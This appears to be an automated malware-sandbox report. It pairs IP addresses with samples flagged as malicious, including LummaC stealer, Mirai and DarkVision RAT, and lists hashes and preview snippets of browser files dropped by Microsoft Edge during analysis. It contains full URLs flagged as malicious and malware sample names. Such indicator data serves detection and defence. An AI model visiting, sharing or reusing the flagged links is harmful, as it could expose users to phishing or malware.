                                                                                                                                                                                                                                                                            https://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.102.79
                                                                                                                                                                                                                                                                            https://report-scam.malwarebouncer.com/XcUR2TnV2VTlXT0s0Z0NYa01KSGt3dUtWMWNiblBrc29mMlpZUU1WdThBSjdDdTlRQTVDV1ZZd0pDeWRmUU5rQ1QvVDNiSlBNYWd2bTd0eTRkZW5jT0hrYTBKWHFiVUc4TVZBOGpiNkh4VG9OTm9zNTVUWHNmNWVydHpqbzhIc1llSzdzTHZ0dENVNWRLZy9BbCsyVDRMSGRHOThUWnV5QUxPU0RZL1dPalNYTmUzMTVoRzl5bmk1ZVZRPT0tLUdVYnJkMC9GazI3MWlxYmotLUpFOURyOWkzK1l6Vy9BYTVOVDBVNkE9PQ==?cid=2346401253Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                                                            • 18.173.205.50
                                                                                                                                                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 19.44.195.99
                                                                                                                                                                                                                                                                            AKAMAI-ASUSBnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                                                            file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 184.28.90.27
                                                                                                                                                                                                                                                                            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.45.0.233
                                                                                                                                                                                                                                                                            NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.49.251.7
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.57.90.149
                                                                                                                                                                                                                                                                            malware.batGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                            • 184.28.90.27
                                                                                                                                                                                                                                                                            https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 104.102.34.86
                                                                                                                                                                                                                                                                            Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.44.181.15
                                                                                                                                                                                                                                                                            Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 95.101.191.171
                                                                                                                                                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSfile_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 52.113.194.132
                                                                                                                                                                                                                                                                            Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 204.79.197.203
                                                                                                                                                                                                                                                                            Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 204.79.197.203
                                                                                                                                                                                                                                                                            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 40.76.134.238
                                                                                                                                                                                                                                                                            https://147y3.trk.elasticemail.com/tracking/click?d=l6DX1ZxoYxoIu3Ps_nHCw2dpTGYsp50KhPgdcLAPZ98lDQqXluI2jbk2Kz6cWaRjWchw5Igbhe-BSjXhcIk5khB6_31XWJ3KxF070e3rxxM9hJmShBhAM7tP0jesqnjYkgFpEuivEIV6QQKt0-F18YQ1#out/0023m/435/85jy1/26p0/41/77Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 52.191.212.24
                                                                                                                                                                                                                                                                            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 20.13.96.71
                                                                                                                                                                                                                                                                            miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 22.35.211.83
                                                                                                                                                                                                                                                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 51.111.190.47
                                                                                                                                                                                                                                                                            i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 65.52.116.212
                                                                                                                                                                                                                                                                            i486.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 20.156.150.63
                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e164pOGv7k4N.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            H565rymIuO.docGet hashmaliciousUnknownBrowse
• 188.114.97.3
| w3245.exe | Get hash | malicious | Unknown | Browse | • 188.114.97.3
| w3245.exe | Get hash | malicious | Unknown | Browse | • 188.114.97.3
| sEG2xXpg0X.xlsm | Get hash | malicious | Unknown | Browse | • 188.114.97.3
| Drivespan.dll | Get hash | malicious | Unknown | Browse | • 188.114.97.3
| installer_1.05_36.8.exe | Get hash | malicious | LummaC | Browse | • 188.114.97.3
| setup.exe | Get hash | malicious | LummaC | Browse | • 188.114.97.3

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | w3245.exe | Get hash | malicious | Unknown | Browse |
| w3245.exe | Get hash | malicious | Unknown | Browse |
| 9mauyKC3JW.exe | Get hash | malicious | Unknown | Browse |
| ATLEQQXO.exe | Get hash | malicious | Unknown | Browse |
| ATLEQQXO.exe | Get hash | malicious | Unknown | Browse |
| upgrade.hta | Get hash | malicious | DarkVision Rat | Browse |
| MiJZ3z4t5K.exe | Get hash | malicious | Unknown | Browse |
| UolJwovI8c.exe | Get hash | malicious | Unknown | Browse |
| ONHQNHFT.msi | Get hash | malicious | Unknown | Browse |
| es.hta | Get hash | malicious | Unknown | Browse |

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 44707
Entropy (8bit): 6.095146489362549
Encrypted: false
SSDEEP: 768:zDXzgWPsj/qlGJqIY8GB4kWuKKGf4yUSqXKVjVqA6N7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynUHOtN7VLyMV/YoskFoz
MD5: 19B3BE8C0FCB8750AD384ABF59ECDD6B
SHA1: 024F98A7741EE7953C6F604C3C48E85264F96AF7
SHA-256: 282A713DEB0E4EC3F09217C4CBD6698F0009893F67178F56D1F6A2D1C9D9E453
SHA-512: 1D508001D62BA7CEB98675E2E67D0D1C53AC7497147203E473DF878463DAC9E71CDC77D2863CA384650429757FB518FEA93B3167A07864E88A4E7469C1353E9E
Malicious: false
Preview: {"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 44769
Entropy (8bit): 6.095008368043801
Encrypted: false
SSDEEP: 768:zDXzgWPsj/qlGJqIY8GB4xSauKKGf4yUSqXE8j3pz2N7DRo+yM/42cRaLMoskCiG:z/Ps+wsI7yOZHOaN7VLyMV/YoskFoz
MD5: F0CB315573E513ABF90C2910ABCE8562
SHA1: 33E7DB515B7793AC1F8A4D3909204204B85B5354
SHA-256: 143212C62EAB4F83C2AC0112F57FF431D619EEABFCFF46CE22F660429507A042
SHA-512: E1B81317D38CC8AF2ACAC832EF4BE77FACD68308E2E5FD7B3A53035C8197CB3415763DF44725BA6C6195EAA6EE3AE76813D77695836D37EB83B12F345AE3B087
Malicious: false
Preview: {"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 46136
Entropy (8bit): 6.087123307204402
Encrypted: false
SSDEEP: 768:uMkbJrT8IeQc5Oa7TbKKGf4yUSqXg8j3pz2HXcQSfMCiop7DRo+yM/42cRaLMosa:uMk1rT8H2agHOWH9Fop7VLyMV/Yosa
MD5: 51D7BAD2ED56E30EFA78420C6A7B5E06
SHA1: 137FBB8BF70A052DDC804952AE694BCC1CC08FA2
SHA-256: 397CFB05D88801278D4A04B03A473D0D93CBED958160A0F0826C9EE04EAC4AED
SHA-512: 95547830AF9FEF2489D789D32759F53360908268E6AA1E4AC0C8CC53801AF1EDD507D052ADDE88189ADF8021B82672E368567B9437D4F9658E698D9732C67784
Malicious: false
Preview: {"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5506496d-86e7-4800-8e39-8350f755112f"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736252348"},"domain_actions_config":"

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 46059
Entropy (8bit): 6.087250121808617
Encrypted: false
SSDEEP: 768:uMkbJrT8IeQc5da7TbKKGf4yUSqXE8j3pz2HXcQSfMCiop7DRo+yM/42cRaLMosa:uMk1rT8H1agHOaH9Fop7VLyMV/Yosa
MD5: 35E9DD4647CD6DCE1B76A32072AFED62
SHA1: 8AF66D49D7AC99D4F08A3A0C6AAD7097BBB680B9
SHA-256: 7F50CB7BC90265D1A98872F64E1A84F3B35B519B05296594DBBAFB117DFEE02F
SHA-512: 7DFD049E35EE31EB7D7673FA4C16970B8CD833E6863553A8A5BD21BDF839799298A9A607DC305E675518C3259182AEFEFE673577135D9A01252E6A80904B2DB4
Malicious: false
Preview: {"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5506496d-86e7-4800-8e39-8350f755112f"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736252348"},"domain_actions_config":"

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 107893
Entropy (8bit): 4.640173185101434
Encrypted: false
SSDEEP: 1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
MD5: 68DDA50FDB9AF6E86F170412111C6190
SHA1: B3171ED37DBCB85AA186B62063672E4E3A218DFE
SHA-256: 56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
SHA-512: 71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
Malicious: false

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 107893
Entropy (8bit): 4.640173185101434
Encrypted: false
SSDEEP: 1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
MD5: 68DDA50FDB9AF6E86F170412111C6190
SHA1: B3171ED37DBCB85AA186B62063672E4E3A218DFE
SHA-256: 56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
SHA-512: 71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.04804516590896966
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:h7/0m5tmznOAUJYFJ/7qiRDs0JEYg7XCJI5JEm98Rdhh+JNV9URQsAvhDnn8y08s:1/0Utkb01jizhONoWhDn08T2RGOD
                                                                                                                                                                                                                                                                                                MD5:A76E171A856A6BAF7E77369A12DAB459
                                                                                                                                                                                                                                                                                                SHA1:2414D58C632ADBE5C62712E07922B187CC3DE252
                                                                                                                                                                                                                                                                                                SHA-256:77367B264B84013BDFDD1C63CF441ACCC32FFBB0BB21A502034E714AD8B6341F
                                                                                                                                                                                                                                                                                                SHA-512:89787700D4C50F68272841E570C5096C9EB504E2F403DDDB2D87E9D04CC3A9764F139D91BB2C20DEC9F9AF944AA5A7439D96A0FDCBEC0BA58CF452BAD19821BC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4555213358345816
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:Y2PhZv2wO5M0WP0s631/RwgOVp4oMZSAiSuqx8lIDhK8nBk+g1HF:ThZy5Zs6F/RwHvIihqxpDhK8nBk+aH
                                                                                                                                                                                                                                                                                                MD5:98ACBF9AE30FC75C5B7CB0F34FF707C1
                                                                                                                                                                                                                                                                                                SHA1:6BCAABC0ACEB34DE83D62514833DBAF3A16B1ED4
                                                                                                                                                                                                                                                                                                SHA-256:DF421CA63CE9A0353A134BBFD6141819FC05758E9137177ED0E2D6BA2A7CE82C
                                                                                                                                                                                                                                                                                                SHA-512:023B0E88D53DF3E4B91DF71A48BD9DBBDA7F504B442DDCD9D3942FA5C29AC91F8246238DC385BA8EDA632FEDCB22F904F47F2A7F268F0BB0369706721FBD6DE6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                                                MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                                                SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                                                SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                                                SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17517), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17519
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.492020860451322
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNPtaeN9PktuYUimYwhtngS0e1/Y8EbV+FOdQA:stxPGKSu4wsOztJtHN9mAgy2bGgQwz
                                                                                                                                                                                                                                                                                                MD5:508260143544AB8934A3ABC5B367F02A
                                                                                                                                                                                                                                                                                                SHA1:2112E0864454C1E98EC5B25D0017AA6449B37EB2
                                                                                                                                                                                                                                                                                                SHA-256:1048FF716D57DC46A1245D46802307381F5DA1F26E451A0B1B1C43356C83DA27
                                                                                                                                                                                                                                                                                                SHA-512:EA692747513640F1D0DC05AF171142BFEDFDCBF3A33DE8CB6C91945156AD00C2EB8DFEE3CA82787E2051CA720C5DA55B40FB1464549F0299493DFAFD2BB5A564
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):37149
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.564316420305124
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:lxqOypWPKsfG78F1+UoAYDCx9Tuqh0VfUC9xbog/OVmwIPAd/rwqWfQqKputur:lxqOypWPKsfG7u1jaDwIIdMqWfJXtg
                                                                                                                                                                                                                                                                                                MD5:6D0BE52BC6B600F6DDE27421D7177034
                                                                                                                                                                                                                                                                                                SHA1:8B06AD28115183F7CA30EB7BB7A56E54A4D2A0AC
                                                                                                                                                                                                                                                                                                SHA-256:220494D2EE786880E010A622C59362F5EA917467CF90539D6EF9FAF669C4EC95
                                                                                                                                                                                                                                                                                                SHA-512:B72C0DE1A4EDE9DE731FF83A8899148E0BA953D91D6A05C6E2F71469B11CE1D2E755D9B0BEFA10B521D7C03B84A7D8D4DB1279677264BC47AA35CE76C1142947
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380725942936385","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380725942936385","location":5,"ma
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.561227482397739
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380725942936385","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380725942936385","location":5,"ma
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17682), with no line terminators
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):17684
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.488648548231993
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13719
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.234589049081205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.23901262256006
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:09.712 1d8c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/07-07:19:09.724 1d8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
